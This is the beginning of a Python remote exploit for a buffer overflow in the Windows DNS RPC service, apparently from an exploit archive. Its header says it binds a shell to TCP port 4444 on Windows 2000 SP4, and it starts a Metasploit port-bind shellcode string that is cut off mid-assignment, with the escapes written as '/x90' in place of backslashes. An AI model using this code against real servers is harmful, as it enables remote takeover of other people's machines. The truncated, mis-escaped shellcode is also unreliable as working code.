- #!/usr/bin/python
- # Remote exploit for the 0day Windows DNS RPC service vulnerability
- # described in http://www.securityfocus.com/bid/23470/info. Tested on
- # Windows 2000 SP4. If successful, the exploit binds a shell to TCP port 4444
- # and then connects to it.
- #
- # Cheers to metasploit for the first exploit.
- # Written for educational and testing purposes.
- # Author shall bear no responsibility for any damage caused by using this code
- # Winny Thomas :-)
- import os
- import sys
- import time
- from impacket.dcerpc import transport, dcerpc, epm
- from impacket import uuid
- # Portbind shellcode from metasploit; binds a shell to TCP port 4444
- shellcode = "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
- shellcode += "/x29/xc9/x83/xe9/xb0/xe8/xff/xff/xff/xff/xc0/x5e/x81/x76/x0e/xe9"
- shellcode += "/x4a/xb6/xa9/x83/xee/xfc/xe2/xf4/x15/x20/x5d/xe4/x01/xb3/x49/x56"
- shellcode +=
MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)